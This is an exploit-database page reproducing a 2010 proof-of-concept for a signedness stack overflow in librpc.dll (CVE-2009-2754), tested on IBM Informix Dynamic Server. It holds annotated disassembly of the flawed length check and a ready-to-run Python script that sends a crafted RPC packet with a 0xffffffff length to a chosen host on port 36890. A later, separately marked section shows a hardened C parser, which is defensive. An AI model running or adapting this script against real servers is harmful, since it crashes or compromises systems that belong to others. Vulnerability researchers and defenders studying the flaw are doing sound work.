0day.today - Biggest Exploit Database in the World.
Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vuln
===============================================================================
Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability
===============================================================================

# Exploit Title: ZDI-10-023: Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability
# Date: 2010-04-08
# Author: ZSploit.com
# Software Link: N/A
# Version: N/A
# Tested on: IBM Informix Dynamic Server 10.0
# CVE : CVE-2009-2754

#! /usr/bin/env python
###############################################################################
## File       : zs_ids_rpc.py
## Description:
##            :
## Created_On : Mar 21 2010
##
## (c) Copyright 2010, ZSploit.com. all rights reserved.
###############################################################################
"""
The issue in __lgto_svcauth_unix():

.text:1000B8E1    mov     [ebp+0], eax
.text:1000B8E4    mov     eax, [ebx]
.text:1000B8E6    push    eax             ; netlong
.text:1000B8E7    add     ebx, 4
.text:1000B8EA    call    esi ; ntohl     ; Get length of hostname
.text:1000B8EC    cmp     eax, 0FFh       ; Signedness error: a length of 0xffffffff (-1) passes this check
.text:1000B8F1    jle     short loc_1000B8FD
.text:1000B8F3    mov     esi, 1
.text:1000B8F8    jmp     loc_1000B9D5
.text:1000B8FD ; ---------------------------------------------------------------------------
.text:1000B8FD
.text:1000B8FD loc_1000B8FD:              ; CODE XREF: __lgto_svcauth_unix+71j
.text:1000B8FD    mov     edi, [ebp+4]
.text:1000B900    mov     ecx, eax
.text:1000B902    mov     edx, ecx
.text:1000B904    mov     esi, ebx
.text:1000B906    shr     ecx, 2
.text:1000B909    rep movsd               ; memcpy here with a user-supplied size causes a stack overflow
.text:1000B90B    mov     ecx, edx
.text:1000B90D    add     eax, 3
.text:1000B910    and     ecx, 3
.text:1000B913    rep movsb
"""

import sys
import socket

if (len(sys.argv) != 2):
    print "Usage:\t%s [target]" % sys.argv[0]
    sys.exit(0)

data = "\x80\x00\x00\x74\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02" \
       "\x00\x01\x86\xb1\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01" \
       "\x00\x00\x00\x4c\x00\x00\xd6\x45\xff\xff\xff\xff\x41\x41\x41\x41" \
       "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00" \
       "\x00\x00\x00\x00\x00\x00\x00\x0a\x42\x42\x42\x42\x42\x42\x42\x42" \
       "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \
       "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" \
       "\x00\x00\x00\x00\x00\x00\x00\x00"

host = sys.argv[1]
port = 36890

print "PoC for ZDI-10-023 by ZSploit.com"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        s.send(data)
        print "Sending payload .."
    except:
        print "Error in send"
    print "Done"
except:
    print "Error in socket"

The ZSploit Team
http://zsploit.com

# 0day.today [2024-10-05] #
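
Added example (not part of the original advisory and not the vendor's code): the signed length comparison described in the disassembly comments, modelled in C next to a hardened parser that treats the length as unsigned and bounds it before copying. The function names, buffer layout (stamp, length word, hostname) and sample credential bytes are assumptions constructed for illustration; the 255 limit is the `0FFh` from the listing.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_NAME 255u   /* the 0FFh limit from the listing */

/* Constructed samples: stamp, hostname length word, hostname bytes. */
static const uint8_t bad_cred[]  = {0x00,0x00,0xd6,0x45, 0xff,0xff,0xff,0xff, 'A','A','A','A'};
static const uint8_t good_cred[] = {0x00,0x00,0xd6,0x45, 0x00,0x00,0x00,0x04, 'h','o','s','t'};

/* Big-endian 32-bit read (what ntohl does to the wire value). */
static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Models only the flawed comparison (cmp/jle is signed); performs no copy.
 * Returns 1 when the length would be accepted. The cast wraps to a negative
 * value on two's-complement targets. */
int signed_check_accepts(const uint8_t *cred) {
    int32_t len = (int32_t)be32(cred + 4);
    return len <= 255;
}

/* Hardened parse: unsigned length, bounded by the protocol limit, by the
 * bytes actually received, and by the destination. Returns length or -1. */
int parse_hostname(const uint8_t *cred, size_t cred_len, char *out, size_t out_size) {
    if (cred_len < 8) return -1;                         /* stamp + length word */
    uint32_t len = be32(cred + 4);
    if (len > MAX_NAME) return -1;                       /* unsigned compare */
    if (len > cred_len - 8) return -1;                   /* no read past the input */
    if (out_size == 0 || len > out_size - 1) return -1;  /* room for the NUL */
    memcpy(out, cred + 8, len);
    out[len] = '\0';
    return (int)len;
}

int main(void) {
    char name[256];
    printf("signed check accepts 0xffffffff: %d\n", signed_check_accepts(bad_cred));
    printf("hardened parser, same input:     %d\n",
           parse_hostname(bad_cred, sizeof bad_cred, name, sizeof name));
    printf("hardened parser, valid input:    %d\n",
           parse_hostname(good_cred, sizeof good_cred, name, sizeof name));
    return 0;
}
```

The same three bounds (protocol limit, received length, destination size) apply to any length-prefixed field read off the wire, not only this hostname.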